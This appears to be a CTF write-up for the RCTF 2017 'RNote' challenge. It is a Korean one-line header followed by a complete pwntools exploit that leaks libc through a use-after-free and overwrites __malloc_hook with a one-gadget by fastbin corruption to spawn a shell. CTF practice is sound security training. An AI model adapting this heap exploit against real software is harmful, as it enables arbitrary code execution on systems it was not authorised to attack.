RCTF 2017 RNote write up

푼 것들 올리는 용

from pwn import *
#context.log_level = "debug"
 
p = process("./RNote")
 
def add(size,title,content):
   p.recvuntil(": ")
   p.sendline('1')
   p.recvuntil(": ")
   p.sendline(str(size))
   p.recvuntil(": ")
   p.sendline(title)
   p.recvuntil(": ")
   p.sendline(content)
 
def delete(idx):
   p.recvuntil(": ")
   p.sendline('2')
   p.recvuntil(": ")
   p.sendline(str(idx))
 
def show(idx):
   p.recvuntil(": ")
   p.sendline('3')
   p.recvuntil(": ")
   p.sendline(str(idx))
 
add(256, 'aaaa', 'aaaa')
add(256, 'aaaa', 'aaaa')
 
delete(0)
 
add(256, 'aaaa', 'bbbbbbbb')
 
show(0)
 
p.recvuntil("bbbbbbbb")
 
main_arena = u64(p.recv(6).ljust(8,'\x00'))
log.info("main_arena = " + hex(main_arena))
 
libc_base = main_arena - 0x3c4b0a
log.info("libc_base = " + hex(libc_base))
 
malloc_hook = libc_base + 0x3c4b10
log.info("malloc_hook = " + hex(malloc_hook))
 
oneshot = libc_base + 0xf1147
log.info("oneshot = " + hex(oneshot))
 
delete(0)
delete(1)
 
add(90, 'a'*4, 'a'*4)
add(90, 'b'*4, 'b'*4)
add(90, 'c'*16+"\x10", 'c')
 
delete(0)
delete(1)
delete(2)
 
add(90, 'aaaa', p64(malloc_hook-0x23))
add(90, 'bbbb', 'bbbb')
add(90, 'cccc', 'cccc')
 
add(90, 'dddd', 'a'*19 + p64(oneshot))
 
p.interactive()